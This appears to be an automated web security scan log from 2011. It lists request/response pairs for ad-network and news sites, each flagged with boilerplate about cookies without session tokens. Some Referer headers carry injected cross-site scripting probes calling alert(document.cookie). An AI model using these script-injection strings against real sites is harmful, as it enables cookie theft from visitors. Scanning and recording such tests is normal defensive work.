HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:46:01 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA53 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=af553d4f97984ae69ffeb82fbcef5634; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=DAFE261BA5894DCFB4A71871ED1DEC9A; domain=.redacted; expires=Wed, 17-Aug-2011 23:46:01 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 34160
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /?u=http%3A%2F%2Fwww.neudesicmediagroup.com%2FAdvertising.aspx%3Fsite%3DSilverlight2d710%2522%253balert(document.cookie)%2F%2F68483822cd8&r=http%3A%2F%2Fburp%2Fshow%2F21 HTTP/1.1 Host: dg.specificclick.net Proxy-Connection: keep-alive Referer: http://www.neudesicmediagroup.com/Advertising.aspx?site=Silverlight2d710%22%3balert(document.cookie)//68483822cd8 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: adp=79jE^0^4095; smdmp=780z:1215201001^780z:201201001^780z:1012200938^780z:1011201009^77xf:99004015^77xe:99001525^77x6:99011769^75W4:99002797^75W4:99004740^74ry:104201102^74ry:811200901^74Xd:99063500; adf=79jE^0^0; ug=uosDj9Liw_xRTA
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-store,no-cache,must-revalidate Cache-Control: post-check=0,pre-check=0 Pragma: no-cache p3p: policyref="http://www.specificmedia.com/w3c/p3p.xml", CP="NON DSP COR ADM DEV PSA PSD IVA OUT BUS STA" Set-Cookie: adp=79jE^0^4095; Domain=.specificclick.net; Expires=Mon, 30-Jan-2012 01:37:56 GMT; Path=/ Set-Cookie: ug=uosDj9Liw_xRTA; Domain=.specificclick.net; Expires=Mon, 30-Jan-2012 01:37:56 GMT; Path=/ Set-Cookie: smdmp=780z:1215201001^780z:201201001^780z:1012200938^780z:1011201009^77xf:99004015^77xe:99001525^77x6:99011769^75W4:99002797^75W4:99004740^74ry:104201102^74ry:811200901^74Xd:99063500; Domain=.specificclick.net; Expires=Mon, 30-Jan-2012 01:37:56 GMT; Path=/ Set-Cookie: adf=79jE^0^0; Domain=.specificclick.net; Expires=Mon, 30-Jan-2012 01:37:56 GMT; Path=/ p3p: policyref="http://www.specificmedia.com/w3c/p3p.xml", CP="NON DSP COR ADM DEV PSA PSD IVA OUT BUS STA" Set-Cookie: ug=uosDj9Liw_xRTA; Domain=.specificclick.net; Expires=Mon, 30-Jan-2012 01:37:56 GMT; Path=/ p3p: policyref="http://www.specificmedia.com/w3c/p3p.xml", CP="NON DSP COR ADM DEV PSA PSD IVA OUT BUS STA" Set-Cookie: nug=; Domain=.specificclick.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Content-Type: text/html Date: Sun, 30 Jan 2011 01:37:55 GMT Vary: Accept-Encoding Connection: Keep-Alive Content-Length: 0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /article.aspx HTTP/1.1 Host: editorial.autos.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:46:08 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA49 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=809818d765004928b3863b73ae1a7281; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=1E98BFEFC7AD4A61B8576A26797B1A16; domain=.autos.redacted; expires=Wed, 17-Aug-2011 23:46:08 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 44823
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /articles/default.aspx HTTP/1.1 Host: editorial.autos.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:46:04 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA49 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=69ea214e2db949c1adb4b09535432079; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=768421AB2A474F75A2A0356E76F9A868; domain=.autos.redacted; expires=Wed, 17-Aug-2011 23:46:04 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 39091
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /blogs/autosblog.aspx HTTP/1.1 Host: editorial.autos.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:46:07 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA55 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=f2055ff4949f4938b5733da1ed24544e; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=30C61D772A2040BEA40CE77407721D63; domain=.autos.redacted; expires=Wed, 17-Aug-2011 23:46:07 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 52512
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /media/default.aspx HTTP/1.1 Host: editorial.autos.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:46:05 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA52 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=7f39811ff05647408c8faea3cdd2f40e; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=7A4C72BC26CB4E3EB7E637ACF81B2D78; domain=.autos.redacted; expires=Wed, 17-Aug-2011 23:46:05 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 37381
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /media/video/default.aspx HTTP/1.1 Host: editorial.autos.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:46:06 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA50 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=1b6d9a1169d84117806825e1245e514d; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=282B2494452D4EF08780001B5E10E010; domain=.autos.redacted; expires=Wed, 17-Aug-2011 23:46:06 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 18476
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.fac ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /new-cars/default.aspx HTTP/1.1 Host: editorial.autos.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:46:02 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA50 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=ff89ea3264c14793bcb0990ab84276b0; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=F28B3EDBC5D6441D845D4C4460CEA484; domain=.autos.redacted; expires=Wed, 17-Aug-2011 23:46:02 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 38329
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /slideshow.aspx HTTP/1.1 Host: editorial.autos.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:46:09 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA51 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=7b4a758c71c84b67bd5ca4184af69515; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=EE184531720E4743A15DC3BBC4F0985E; domain=.autos.redacted; expires=Wed, 17-Aug-2011 23:46:09 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 36444
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /used-cars/default.aspx HTTP/1.1 Host: editorial.autos.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:46:04 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA55 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=0f2992fc55e64374a8de46d105ca4355; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=8E803F046F9B48FC80C03D86EE3DD45F; domain=.autos.redacted; expires=Wed, 17-Aug-2011 23:46:04 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 34182
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: entertainment.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 51392 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: stad=; path=/ Set-Cookie: MC1=V=3&GUID=77a66bfe41db42d28e4f88077be1798b; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/ X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:46:12 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /news/ HTTP/1.1 Host: entertainment.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 62350 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: stad=; path=/ Set-Cookie: MC1=V=3&GUID=995146dbfad74c20970e903f13e0f1ce; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/ X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:46:14 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head><title> Just In Ne ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /video/ HTTP/1.1 Host: entertainment.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 26701 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: stad=; path=/ Set-Cookie: MC1=V=3&GUID=67f07d4e22dd45d1976d2b39e3c3771d; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/ X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:46:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en-us/cc136530.aspx HTTP/1.1 Host: expression.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: A=I&I=AxUFAAAAAAD4BwAAfetuS+xFfAxTn86aknonWg!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:41:15 GMT; path=/ Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:41:15 GMT Content-Length: 66884
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><link i ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: health.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:46:55 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA19 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=1133fe74be594c568a34ac6ad24cff7a; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=CE873C51A3AB43DBA17ADCF0FD9904FA; domain=.redacted; expires=Wed, 17-Aug-2011 23:46:55 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 36431
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http:// ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: helenaspopkin.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 02:07:18 GMT Server: Apache/2.2.9 (Debian) Vary: negotiate,Accept-Encoding TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=4166254bf39fbdb2b2c04df95de6c650; expires=Sat, 25-Jan-2031 02:07:18 GMT; path=/; domain=.newsvine.com Content-Length: 0 Content-Type: text/html Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /getuid HTTP/1.1 Host: ib.adnxs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anj=Kfu=8fG6Q/DYS3+0s]#%2L_'x%SEV/i#+93=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]-sVkK=XaP9JgIyKY?AZ2?cN2AYU+6+y:OCAzxnxZ]T%isfEi1j6e[?U_=%p.dR$pzM:4KKhq.Wf[V?>]Uq'j<LI7Z3NZg<?)dNKuDMOC67s9kowxd<'fQ6TwL.7!@Nno(bTV'J<hKMSzM(Q66u2x%X_(L:SlM('INuCClbQ^7w=#?jImiI0aU8E.A1>N#b#Qdqc@TwKrL$L2pv>3u[KE^pd=S(K$r@Fp>9H; icu=EAAYAA..; uuid2=4760492999213801733; sess=1;
Response
HTTP/1.1 302 Moved Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Mon, 31-Jan-2011 02:08:24 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sat, 30-Apr-2011 02:08:24 GMT; domain=.adnxs.com; HttpOnly Location: ..*. Date: Sun, 30 Jan 2011 02:08:24 GMT Content-Length: 0 Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /seg?member=104&add_code=86011 HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://www.reimage.com/lp/nhome/index.php?tracking=Neudesic69f18%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E602f708c63d&banner=&banner=728x90-1\&adgroup=direct&ads_name=direct&keyword=direct Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: icu=EAAYAA..; sess=1; uuid2=4760492999213801733; anj=Kfu=8fG7*@DYS3+0s]#%2L_'x%SEV/i#-2N=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]-sVkK=XaP9JgIyKY?AZ2?cN2AYU+6+y:OCAzxnxZ]T%isfEi1j6e[?U_=%p.dR$pzM:4KKhq.Wf[V?>]Uq'j<LI7Z3NZg<?)dNKuDMOC67s9kowxd<'fQ6TwL.7!@Nno(bTV'J<hKMSzM(Q66u2x%X_(L:SlM('INuCClbQ^7w=#_iB?.d1/(e7aL+.AJ_WH9u4SPD=p^m
Response
HTTP/1.1 302 Found Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Mon, 31-Jan-2011 01:23:55 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sat, 30-Apr-2011 01:23:55 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sat, 30-Apr-2011 01:23:55 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG6Q/DYS3+0s]#%2L_'x%SEV/i#+93=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]-sVkK=XaP9JgIyKY?AZ2?cN2AYU+6+y:OCAzxnxZ]T%isfEi1j6e[?U_=%p.dR$pzM:4KKhq.Wf[V?>]Uq'j<LI7Z3NZg<?)dNKuDMOC67s9kowxd<'fQ6TwL.7!@Nno(bTV'J<hKMSzM(Q66u2x%X_(L:SlM('INuCClbQ^7w=#?jImiI0aU8E.A1>N#b#QOC'2OMcvd#bcb!]*j^2`kdi6<Po<z!?1VRH; path=/; expires=Sat, 30-Apr-2011 01:23:55 GMT; domain=.adnxs.com; HttpOnly Location: http://aidps.redcated/AI/Api/v1/UserRest.svc/Provider/1AC1C520-232B-4E3D-B0CC-A52AC15EB7D4/User/4760492999213801733/gif?meta=appNexus Date: Sun, 30 Jan 2011 01:23:55 GMT Content-Length: 0
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: ingame.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sun, 30 Jan 2011 02:07:24 GMT Server: Apache/2.2.9 (Debian) Vary: negotiate,Accept-Encoding TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=2f27a7911e836626553146fb369daabe; expires=Sat, 25-Jan-2031 02:07:24 GMT; path=/; domain=.newsvine.com Location: http://ingame.msnbc.msn.com/ Content-Length: 2 Content-Type: text/html Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
//Vermont-12.4.0-1012 var rsi_now= new Date(); var rsi_csid= 'A06546';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da){this._rsiaa=Da;this._rsiba ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: latino.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /adcedge/lb?site=695501&srvc=1&betr=merchant_cs=1&betq=11325=420981 HTTP/1.1 Host: leadback.advertising.com Proxy-Connection: keep-alive Referer: http://www.merchantcircle.com/corporate/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ACID=Bc330012940999670074; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; GUID=MTI5NjMwODMzMjsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; C2=H8LRNJpwIg02FzECdbdxMhwUwXMTI8Y4FzECYTexMhQ3gZMTIQTnGzECF2pxMhAohXMTIYZ4FzECKGexMhwohXMTIca4FzECiGexMhQshXMTwOYAM/ohjI7YCwAoGs0r1RQcKaQMGK2AI9YhqN53EkL3FHzgPXw6TVcVsumB/0mRjca7HIaWGBQrMew41ZYDkq1B6bjRNq6bDwWZGs6r4jQsMaEKwaHCW8oRo0I9IsfzFnysNiQQoaMT; F1=BcwvE1kAAAAAdVyCAEAAgEABAAAABAAAAUAAGAA; BASE=YnQIx8MmSf+Tkd8dWtaeW84rjjGaJl2JpJJ5e82KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC5uk1WFp+Zw63fzJnhGhJ9szxwHZQnZLI364iQjUbvXTIm5HoBJ/dvGrgJkH34AWEQ50klrods4GEQpslbnta1jyi06DY4goRuq7lNfytkpMGnkn13F/thphT9BVrj4TEB4tA8HhyePTdrXAHCI5I8ZJSPfosItSm2KGbW4bMg1diWeoat4pBWAsS0xuVBChK5UAQMdxKbZkoze5s76NIPb4CdQ/w8CXYuay4+lyQWK0GVSchMSu3n3ygrt1ByPVHFBx+JMtaedPpgtfj+pBX0truazR7M6ZuK9sVxhFZZ4MxpJbJc+KhQNAB0IaOZcfXUiSdOO0D8u4hyiFT/96RHBwMCa4UuiFfHFuaQQKkvI0Ica251TOMxGv0hzcvsl8LyNHqKFpTNKVBAUdzcbw/CzAvQzbu5wzg9ZCSgMt4q9GO44FPGyXSU1PH45OxD5VJciBItw68hvpOMeNkZCp6Oah7P40wy94BpsD33jn2wByhMmp+2rVS0xYYdyQ0dnp+0oE+uA!; ROLL=v5Q2H0MbU/zqUNH1h7d3T1ystuIiEaPHy4fCVadX/ASOjE6f+wnqYseyuA0vwlvFYFjqzjc8zqkwR3t+XXAr8QlWG4SSF/7N1Eja1YV2UmztMwbFznDUKtzd8HNCCLwX3RIWa/0nS8WT042H7E5JNtYzd2SZZdA!
Response
